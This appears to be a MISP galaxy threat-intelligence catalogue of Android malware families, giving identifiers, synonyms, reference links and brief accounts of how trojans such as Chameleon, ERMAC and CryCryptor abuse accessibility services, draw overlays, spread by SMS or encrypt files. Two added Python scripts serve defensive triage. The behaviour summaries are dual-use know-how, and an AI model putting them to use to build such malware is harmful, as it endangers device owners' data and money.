- https://securelist.com/the-state-of-stalkerware-in-2021/106193/ - webarchive
- https://www.threatfabric.com/blogs/2020_year_of_the_rat.html - webarchive
- https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html - webarchive
- https://nur.pub/cerberus-analysis - webarchive
- https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/ - webarchive
- https://www.biznet.com.tr/wp-content/uploads/2020/08/Cerberus.pdf - webarchive
- https://community.riskiq.com/article/85b3db8c - webarchive
- https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html - webarchive
- https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko - webarchive
- https://blog.cyberint.com/cerberus-is-dead-long-live-cerberus - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Chameleon
Chameleon is an Android trojan that impersonates legitimate entities to steal data from users in Australia and Poland. It abuses the Android Accessibility Service to monitor and modify what is shown on the device screen.
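Because Chameleon, like many of the bankers on this page, depends on the victim enabling an accessibility service, a first triage step on a suspect device is to list which services are enabled and which of them belong to third-party packages. The helper below is an added example, not code from the Chameleon reports; it parses the value of the secure setting enabled_accessibility_services (a colon-separated list of Android ComponentName strings, as returned by adb shell settings get secure enabled_accessibility_services) and the output of adb shell pm list packages -3. The allowlist and the sample device output are constructed for the example.

```python
"""Triage helper: which enabled Android accessibility services are unexpected?
Added example (not from the Chameleon analyses); sample values are constructed."""

# Hypothetical allowlist of packages an organisation expects to run an
# accessibility service (TalkBack is Android's screen reader).
KNOWN_GOOD_PACKAGES = {
    "com.google.android.marvin.talkback",
}

# Constructed sample of `adb shell settings get secure enabled_accessibility_services`.
SAMPLE_ENABLED = (
    "com.google.android.marvin.talkback/com.google.android.marvin.talkback.TalkBackService:"
    "com.example.crm.update/.AccService"
)

# Constructed sample of `adb shell pm list packages -3` (third-party packages only).
SAMPLE_THIRD_PARTY = "package:com.example.crm.update\npackage:com.whatsapp\n"


def parse_enabled_services(value: str) -> list[tuple[str, str]]:
    """Split the setting into (package, fully-qualified service class) pairs.

    The setting is empty or the literal string "null" when nothing is enabled.
    A class name starting with '.' is shorthand relative to the package.
    """
    services = []
    for entry in value.split(":"):
        entry = entry.strip()
        if not entry or entry == "null":
            continue
        pkg, _, cls = entry.partition("/")
        if cls.startswith("."):
            cls = pkg + cls
        services.append((pkg, cls))
    return services


def parse_third_party_packages(pm_output: str) -> set[str]:
    """Parse `pm list packages -3` output ('package:<name>' per line)."""
    pkgs = set()
    for line in pm_output.splitlines():
        line = line.strip()
        if line.startswith("package:"):
            pkgs.add(line[len("package:"):])
    return pkgs


def flag_unexpected_services(enabled_value: str, pm_output: str,
                             allowlist: set[str] = KNOWN_GOOD_PACKAGES) -> list[dict]:
    """Return every enabled service whose package is not allowlisted.

    Each hit records whether the package is a third-party (sideloaded or
    store-installed) app, which is where a dropper-delivered banker lives.
    """
    third_party = parse_third_party_packages(pm_output)
    hits = []
    for pkg, cls in parse_enabled_services(enabled_value):
        if pkg in allowlist:
            continue
        hits.append({"package": pkg, "service": cls, "third_party": pkg in third_party})
    return hits


if __name__ == "__main__":
    for hit in flag_unexpected_services(SAMPLE_ENABLED, SAMPLE_THIRD_PARTY):
        print(f"[!] {hit['package']} runs {hit['service']} "
              f"(third-party: {hit['third_party']})")
```

On a real device the two strings come from adb; any hit that is a third-party package with an accessibility service the user cannot explain should be pulled for analysis rather than just disabled, since the same permission lets the app re-enable itself and hide the settings screen.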
Internal MISP references
UUID 90b3a256-311d-416b-b333-e02b910ba75d
which can be used as unique global reference for Chameleon
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.chameleon - webarchive
- https://blog.cyble.com/2023/04/13/chameleon-a-new-android-malware-spotted-in-the-wild/ - webarchive
- https://www.threatfabric.com/blogs/chameleon-is-now-targeting-employees-masquerading-as-crm-app - webarchive
- https://www.threatfabric.com/blogs/android-banking-trojan-chameleon-is-back-in-action - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Chamois
Internal MISP references
UUID 2e230ff8-3971-4168-a966-176316cbdbf2
which can be used as unique global reference for Chamois
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.chamois - webarchive
- https://android-developers.googleblog.com/2017/03/detecting-and-eliminating-chamois-fraud.html - webarchive
- https://github.com/maddiestone/ConPresentations/blob/master/KasperskySAS2019.Chamois.pdf - webarchive
- https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-unpacking-packed-unpacker-reversing-android-anti-analysis-native-library/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Charger
Internal MISP references
UUID 6e0545df-8df6-4990-971c-e96c4c60d561
which can be used as unique global reference for Charger
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2019/02/ESET_Android_Banking_Malware.pdf - webarchive
- http://blog.checkpoint.com/2017/01/24/charger-malware/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-january-14-29-2017 - webarchive
- http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Chinotto (Android)
Internal MISP references
UUID 6cc7b402-21cf-4510-be7d-d7f811a57bc1
which can be used as unique global reference for Chinotto (Android)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Chrysaor
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Chrysaor.
Known Synonyms |
---|
JigglyPuff |
Pegasus |
Internal MISP references
UUID 52acea22-7d88-433c-99e6-8fef1657e3ad
which can be used as unique global reference for Chrysaor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor - webarchive
- https://twitter.com/alexanderjaeger/status/1417447732030189569 - webarchive
- https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-appendix-d/ - webarchive
- https://objective-see.com/blog/blog_0x67.html - webarchive
- https://thewire.in/rights/sar-geelani-pegasus-spyware-phone-messages - webarchive
- https://www.bleepingcomputer.com/news/security/iphones-running-latest-ios-hacked-to-deploy-nso-group-spyware/ - webarchive
- https://www.theguardian.com/news/2021/jul/18/viktor-orban-using-nso-spyware-in-assault-on-media-data-suggests - webarchive
- https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/ - webarchive
- https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf - webarchive
- https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html - webarchive
- https://threatpost.com/nso-pegasus-spyware-bans-apple-accountability/167965/ - webarchive
- https://nex.sx/blog/2021/08/03/the-pegasus-project.html - webarchive
- https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html - webarchive
- https://www.cybertrends.it/pegasus-lo-spyware-per-smartphone-come-funziona-e-come-ci-si-puo-proteggere/ - webarchive
- https://www.amnesty.org/en/latest/news/2021/07/the-pegasus-project/ - webarchive
- https://lifars.com/2022/01/forensics-analysis-of-the-nso-groups-pegasus-spyware/ - webarchive
- https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/ - webarchive
- https://citizenlab.ca/2022/04/peace-through-pegasus-jordanian-human-rights-defenders-and-journalists-hacked-with-pegasus-spyware/ - webarchive
- https://citizenlab.ca/2021/08/bahrain-hacks-activists-with-nso-group-zero-click-iphone-exploits/ - webarchive
- https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/ - webarchive
- https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html - webarchive
- https://thewire.in/government/project-pegasus-journalists-ministers-activists-phones-spying - webarchive
- https://citizenlab.ca/2021/07/amnesty-peer-review/ - webarchive
- https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-3/ - webarchive
- https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-2/ - webarchive
- https://www.theguardian.com/news/2021/jul/18/revealed-murdered-journalist-number-selected-mexico-nso-client-cecilio-pineda-birto - webarchive
- https://www.washingtonpost.com/technology/2021/07/18/reactions-pegasus-project-nso/ - webarchive
- https://zetter.substack.com/p/pegasus-spyware-how-it-works-and - webarchive
- https://forbiddenstories.org/pegasus-the-new-global-weapon-for-silencing-journalists/ - webarchive
- https://www.theguardian.com/news/series/pegasus-project - webarchive
- https://thewire.in/tag/pegasus-project - webarchive
- https://twitter.com/HackSysTeam/status/1418223814387765258?s=20 - webarchive
- https://www.washingtonpost.com/investigations/interactive/2021/nso-spyware-pegasus-cellphones/ - webarchive
- https://citizenlab.ca/2020/12/the-great-ipwn-journalists-hacked-with-suspected-nso-group-imessage-zero-click-exploit/ - webarchive
- https://www.washingtonpost.com/investigations/2021/07/18/takeaways-nso-pegasus-project/ - webarchive
- https://www.washingtonpost.com/world/2021/07/19/india-nso-pegasus/ - webarchive
- https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/ - webarchive
- https://www.theguardian.com/world/2021/jul/18/nso-spyware-used-to-target-family-of-jamal-khashoggi-leaked-data-shows-saudis-pegasus - webarchive
- https://thewire.in/media/pegasus-project-spyware-indian-journalists - webarchive
- https://www.theguardian.com/world/2021/jul/18/revealed-leak-uncovers-global-abuse-of-cyber-surveillance-weapon-nso-group-pegasus - webarchive
- https://www.washingtonpost.com/investigations/interactive/2021/jamal-khashoggi-wife-fiancee-cellphone-hack/?itid=co_pegasus_5 - webarchive
- https://citizenlab.ca/2021/11/palestinian-human-rights-defenders-hacked-nso-groups-pegasus-spyware/ - webarchive
- https://github.com/AmnestyTech/investigations/tree/master/2021-07-18_nso - webarchive
- https://media.ccc.de/v/33c3-7901-pegasus_internals - webarchive
- https://forbiddenstories.org/the-pegasus-project-a-worldwide-collaboration-to-counter-a-global-crime/ - webarchive
- https://www.cyjax.com/2021/10/26/mercenary-apts-an-exploration/ - webarchive
- https://citizenlab.ca/2021/10/breaking-news-new-york-times-journalist-ben-hubbard-pegasus/ - webarchive
- https://therecord.media/mexican-army-spyware - webarchive
- https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/ - webarchive
- https://www.reuters.com/technology/how-saudi-womans-iphone-revealed-hacking-around-world-2022-02-17/ - webarchive
- https://twitter.com/billmarczak/status/1416801439402262529 - webarchive
- https://www.trendmicro.com/en_us/research/21/i/analyzing-pegasus-spywares-zero-click-iphone-exploit-forcedentry.html - webarchive
- https://thewire.in/government/indian-army-bsf-raw-pegasus-spyware-threat - webarchive
- https://blog.zecops.com/research/the-recent-ios-0-click-cve-2021-30860-sounds-familiar-an-unreleased-write-up-one-year-later/ - webarchive
- https://www.washingtonpost.com/technology/2021/07/19/apple-iphone-nso/ - webarchive
- https://irpimedia.irpi.eu/sorveglianze-cy4gate/ - webarchive
- https://www.iverify.io/post/clipping-wings-our-analysis-of-a-pegasus-spyware-sample - webarchive
- https://citizenlab.ca/2020/01/stopping-the-press-new-york-times-journalist-targeted-by-saudi-linked-pegasus-spyware-operator/ - webarchive
- https://forbiddenstories.org/about-the-pegasus-project/ - webarchive
- https://www.vice.com/en/article/xgx5bw/amazon-aws-shuts-down-nso-group-infrastructure - webarchive
- https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://www.lemonde.fr/projet-pegasus/article/2021/07/18/au-maroc-comme-en-france-des-journalistes-mis-sous-surveillance-avec-le-logiciel-pegasus_6088654_6088648.html - webarchive
- https://citizenlab.ca/2022/04/catalangate-extensive-mercenary-spyware-operation-against-catalans-using-pegasus-candiru/ - webarchive
- https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-1 - webarchive
- https://arkadiyt.com/2021/07/25/scanning-your-iphone-for-nso-group-pegasus-malware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Clientor
Internal MISP references
UUID c0a48ca3-682d-45bc-805c-e62aecd4c724
which can be used as unique global reference for Clientor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Clipper
Internal MISP references
UUID ff9b47c6-a5b5-4531-abfc-2e4db3dcdc7e
which can be used as unique global reference for Clipper
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.clipper - webarchive
- https://news.drweb.com/show?lng=en&i=12739 - webarchive
- https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/ - webarchive
- https://lukasstefanko.com/2019/02/android-clipper-found-on-google-play.html - webarchive
- https://web.archive.org/web/20201107225915/https://lukasstefanko.com/2019/02/android-clipper-found-on-google-play.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CloudAtlas
Internal MISP references
UUID ed780667-b67c-4e17-ab43-db1b7e018e66
which can be used as unique global reference for CloudAtlas
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CometBot
Internal MISP references
UUID 151bf399-aa8f-4160-b9b5-8fe222f2a6b1
which can be used as unique global reference for CometBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Connic
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Connic.
Known Synonyms |
---|
SpyBanker |
Internal MISP references
UUID 93b1c63a-4a34-44fd-805b-0a3470ff7e6a
which can be used as unique global reference for Connic
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Coper
Coper is a descendant of ExoBotCompat, which was a rewritten version of Exobot. Malicious Coper apps have a modular architecture and a multi-stage infection mechanism. Coper was originally spotted in Colombia but has since emerged in Europe as well.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Coper.
Known Synonyms |
---|
ExobotCompact |
Octo |
Internal MISP references
UUID 70973ef7-e031-468f-9420-d8aa4eb7543a
which can be used as unique global reference for Coper
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.coper - webarchive
- https://x.com/cleafylabs/status/1833145006585987374 - webarchive
- https://labs.k7computing.com/index.php/play-store-app-serves-coper-via-github/ - webarchive
- https://threatfabric.com/blogs/octo-new-odf-banking-trojan.html - webarchive
- https://thehackernews.com/2022/04/new-octo-banking-trojan-spreading-via.html - webarchive
- https://cert-agid.gov.it/news/analisi-e-approfondimenti-tecnici-sul-malware-coper-utilizzato-per-attaccare-dispositivi-mobili/ - webarchive
- https://cert.pl/posts/2021/12/aktywacja-aplikacji-iko/ - webarchive
- https://blog.cyble.com/2022/03/24/coper-banking-trojan/ - webarchive
- https://www.threatfabric.com/blogs/octo2-european-banks-already-under-attack-by-new-malware-variant - webarchive
- https://www.trendmicro.com/en_us/research/22/g/examining-new-dawdropper-banking-dropper-and-daas-on-the-dark-we.html - webarchive
- https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace - webarchive
- https://www.bleepingcomputer.com/news/security/new-android-banking-malware-remotely-takes-control-of-your-device/ - webarchive
- https://www.team-cymru.com/post/coper-octo-a-conductor-for-mobile-mayhem-with-eight-limbs - webarchive
- https://twitter.com/icebre4ker/status/1541875982684094465 - webarchive
- https://www.domaintools.com/resources/blog/uncovering-octo2-domains/ - webarchive
- https://news.drweb.com/show/?p=0&lng=en&i=14259&c=0 - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Copybara
Internal MISP references
UUID e3d07fda-d29d-42e4-a0d6-5827b2d14d17
which can be used as unique global reference for Copybara
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.copybara - webarchive
- https://www.threatfabric.com/blogs/toad-fraud - webarchive
- https://www.threatfabric.com/blogs/brata-a-tale-of-three-families - webarchive
- https://www.cleafy.com/cleafy-labs/on-device-fraud-on-the-rise-exposing-a-recent-copybara-fraud-campaign - webarchive
- https://www.threatfabric.com/blogs/brata-a-tale-of-three-families.html - webarchive
- https://www.zscaler.com/blogs/security-research/technical-analysis-copybara - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Coronavirus Android Worm
Poses as an app that offers a "corona safety mask", but instead reads the phone's address book and sends SMS messages to the victim's contacts carrying its own download link, spreading itself.
Internal MISP references
UUID f041032e-01af-4e66-9fb2-f8da88a6ea35
which can be used as unique global reference for Coronavirus Android Worm
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.corona_worm - webarchive
- https://www.zscaler.com/blogs/research/new-android-app-offers-coronavirus-safety-mask-delivers-sms-trojan - webarchive
- https://dissectingmalwa.re/jamba-superdeal-helo-sir-you-want-to-buy-mask-corona-safety-mask-sms-scam.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cpuminer (Android)
Internal MISP references
UUID 8a42a699-1746-498b-a558-e7113bb916c0
which can be used as unique global reference for Cpuminer (Android)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CraxsRAT
Internal MISP references
UUID 1f7a8a57-f3e2-4e4b-a4d7-8eb0ba9243c5
which can be used as unique global reference for CraxsRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CryCryptor
According to NHS Digital, CryCryptor is distributed via websites that spoof health organisations; at the time of publication the spoofed sites targeted the Canadian health service. CryCryptor is not available from the Google Play store, so devices restricted to running only apps from the store are not affected.
When CryCryptor runs it encrypts common file types and saves a ransom note in every directory where files have been encrypted. Encrypted files have the extension '.enc' appended to their filenames. For each encrypted file, additional files are written containing the salt value used in that encryption and the initialisation vector, with the extensions '.enc.salt' and '.enc.iv' respectively.
Once files have been encrypted, a notification is displayed directing the user to open the ransom note.
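The per-file '.enc', '.enc.salt' and '.enc.iv' triplet described above is a convenient forensic signature. The script below is an added example, not CryCryptor's own code or part of the NHS Digital advisory; it walks a recovered filesystem tree, lists every '.enc' file, checks whether its salt and IV companions are present (both are needed for any later decryption attempt), and counts affected directories. The ransom note's filename is not given on this page, so the script does not look for it. The sample tree is constructed in a temporary directory for the example.

```python
"""Triage CryCryptor-style artifacts on a recovered Android filesystem tree.
Added example (not from the advisory); the sample tree is constructed."""
import os
import tempfile
from dataclasses import dataclass, field
from pathlib import Path

ENC_SUFFIX = ".enc"          # appended to every encrypted file
SALT_SUFFIX = ".salt"        # '<name>.enc.salt' holds the per-file salt
IV_SUFFIX = ".iv"            # '<name>.enc.iv' holds the per-file IV


@dataclass
class EncryptedFile:
    path: str
    has_salt: bool
    has_iv: bool

    @property
    def original_name(self) -> str:
        """Filename before CryCryptor appended '.enc'."""
        return self.path[:-len(ENC_SUFFIX)]

    @property
    def recoverable(self) -> bool:
        """True when both key-derivation inputs survived on disk."""
        return self.has_salt and self.has_iv


@dataclass
class TriageResult:
    encrypted: list = field(default_factory=list)
    directories: dict = field(default_factory=dict)  # dir -> number of .enc files


def scan_tree(root: str) -> TriageResult:
    """Walk `root` and collect '.enc' files with the state of their companions."""
    result = TriageResult()
    for dirpath, _dirs, files in os.walk(root):
        names = set(files)
        for name in sorted(files):
            if not name.endswith(ENC_SUFFIX):
                continue  # plain files and the .enc.salt / .enc.iv side files
            result.encrypted.append(EncryptedFile(
                path=os.path.join(dirpath, name),
                has_salt=(name + SALT_SUFFIX) in names,
                has_iv=(name + IV_SUFFIX) in names,
            ))
            result.directories[dirpath] = result.directories.get(dirpath, 0) + 1
    result.encrypted.sort(key=lambda e: e.path)
    return result


def incomplete_files(result: TriageResult) -> list:
    """Encrypted files missing a salt or IV companion (decryption impossible)."""
    return [e for e in result.encrypted if not e.recoverable]


def build_sample_tree() -> str:
    """Constructed layout mimicking what CryCryptor leaves behind (made-up data)."""
    root = tempfile.mkdtemp(prefix="crycryptor_triage_")
    pics = Path(root, "DCIM")
    docs = Path(root, "Documents")
    pics.mkdir()
    docs.mkdir()
    # a fully encrypted photo with both companions present
    for name in ("IMG_001.jpg.enc", "IMG_001.jpg.enc.salt", "IMG_001.jpg.enc.iv"):
        (pics / name).touch()
    # an encrypted document whose IV side file was lost
    for name in ("report.pdf.enc", "report.pdf.enc.salt"):
        (docs / name).touch()
    # an untouched file
    (docs / "notes.txt").touch()
    return root


if __name__ == "__main__":
    res = scan_tree(build_sample_tree())
    for e in res.encrypted:
        print(f"{e.path}  original={os.path.basename(e.original_name)} "
              f"salt={e.has_salt} iv={e.has_iv}")
    print(f"{len(res.encrypted)} encrypted files in {len(res.directories)} directories, "
          f"{len(incomplete_files(res))} missing salt/IV")
```

Run it against a mounted image or an adb pull of /sdcard rather than the live device, and preserve the '.enc.salt' and '.enc.iv' files alongside their '.enc' counterparts: without them, even a recovered key cannot be applied to that file.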
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CryCryptor.
Known Synonyms |
---|
CryCrypter |
CryDroid |
Internal MISP references
UUID 21e9d7e6-6e8c-49e4-8869-6bac249cda8a
which can be used as unique global reference for CryCryptor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CyberAzov
Internal MISP references
UUID bb1821f9-eace-4e63-b55d-fc7821a6e5f1
which can be used as unique global reference for CyberAzov
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.cyber_azov - webarchive
- https://twitter.com/sekoia_io/status/1554086468104196096 - webarchive
- https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag/ - webarchive
- https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DAAM
According to PCrisk, DAAM is an Android malware utilized to gain unauthorized access to targeted devices since 2021. With the DAAM Android botnet, threat actors can bind harmful code with a genuine application using its APK binding service.
Lookout refers to this malware as BouldSpy and assesses with medium confidence that this Android surveillance tool is used by the Law Enforcement Command of the Islamic Republic of Iran (FARAJA).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DAAM.
Known Synonyms |
---|
BouldSpy |
Internal MISP references
UUID 37a3b62e-99da-47d7-81fb-78f745427b16
which can be used as unique global reference for DAAM
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dark Shades
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dark Shades.
Known Synonyms |
---|
Rogue |
Internal MISP references
UUID 97fe35c9-f50c-495f-8736-0ecd95c70192
which can be used as unique global reference for Dark Shades
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DawDropper
Internal MISP references
UUID bd9756da-220d-48d6-a4f5-6646558c4b30
which can be used as unique global reference for DawDropper
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DEFENSOR ID
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DEFENSOR ID.
Known Synonyms |
---|
Defensor Digital |
Internal MISP references
UUID 76346e4d-d14e-467b-9409-82b28a4d6cd6
which can be used as unique global reference for DEFENSOR ID
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.defensor_id - webarchive
- https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dendroid
Internal MISP references
UUID 89989df2-e8bc-4074-a8a2-130a15d6625f
which can be used as unique global reference for Dendroid
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.dendroid - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=a29d7d7a-f150-46cf-9bb9-a1f9f4d32a80&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
dmsSpy
Internal MISP references
UUID 72a25832-4bf4-4505-a77d-8c0fc52dc85d
which can be used as unique global reference for dmsSpy
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.dmsspy - webarchive
- https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/ - webarchive
- https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DoubleAgent
Internal MISP references
UUID 73fd1bda-e4aa-4777-a628-07580bc070f4
which can be used as unique global reference for DoubleAgent
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DoubleLocker
Internal MISP references
UUID 10d0115a-00b4-414e-972b-8320a2bb873c
which can be used as unique global reference for DoubleLocker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dracarys
Android malware that impersonates genuine applications such as Signal, Telegram, WhatsApp, YouTube and other chat applications, and is distributed through phishing sites.
Internal MISP references
UUID bf94eee6-2274-40f4-b181-2b49ce6ef9fb
which can be used as unique global reference for Dracarys
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DragonEgg
Android variant of ios.LightSpy.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DragonEgg.
Known Synonyms |
---|
LightSpy |
Internal MISP references
UUID 4ef28f14-17f4-4f87-a292-e63b42027c8c
which can be used as unique global reference for DragonEgg
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DroidJack
Internal MISP references
UUID 8990cec7-ddd8-435e-97d6-5b36778e86fe
which can be used as unique global reference for DroidJack
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DroidWatcher
Internal MISP references
UUID 15f3e50b-9fa5-4eab-ac2b-928e9ce03b72
which can be used as unique global reference for DroidWatcher
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DualToy (Android)
Internal MISP references
UUID 8269e779-db23-4c94-aafb-36ee94879417
which can be used as unique global reference for DualToy (Android)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dvmap
Internal MISP references
UUID e5de818e-d25d-47a8-ab31-55fc992bf91b
which can be used as unique global reference for Dvmap
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Elibomi
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Elibomi.
Known Synonyms |
---|
Drinik |
Internal MISP references
UUID 63cc0b01-c92e-40e7-8669-48d10a490ffb
which can be used as unique global reference for Elibomi
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.elibomi - webarchive
- https://blog.cyble.com/2021/09/07/fake-income-tax-application-targets-indian-taxpayers/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/phishing-android-malware-targets-taxpayers-in-india/ - webarchive
- https://www.trendmicro.com/en_vn/research/22/k/massive-phishing-campaigns-target-india-banks-clients.html#:~:text=We%20found%20five%20banking%20malware,card%20information%20via%20phishing%20campaigns.&text=We%20observed%20an%20uptick%20in,message%20with%20a%20phishing%20link. - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ERMAC
According to Intel471, ERMAC is an Android banking trojan that detects when certain targeted apps are launched and then draws an overlay over their screen to steal the user's credentials.
Internal MISP references
UUID 602944f4-a86c-4a05-b98f-cfb525fb8896
which can be used as unique global reference for ERMAC
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.ermac - webarchive
- https://research.nccgroup.com/2023/09/11/from-ermac-to-hook-investigating-the-technical-differences-between-two-android-malware-variants/ - webarchive
- https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html - webarchive
- https://twitter.com/ShilpeshTrivedi/status/1709096404835356883 - webarchive
- https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace - webarchive
- https://twitter.com/ESETresearch/status/1445618031464357888 - webarchive
- https://intel471.com/blog/rmac-2-0-perfecting-the-art-of-account-takeover - webarchive
- https://blog.cyble.com/2022/05/25/ermac-back-in-action/ - webarchive
- https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ErrorFather
ErrorFather is an Android banking trojan with a multi-stage dropper. The final payload is derived from the Cerberus source code leak.
Internal MISP references
UUID 2c7f6a97-4469-4f97-9a69-5549282a94a6
which can be used as unique global reference for ErrorFather
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
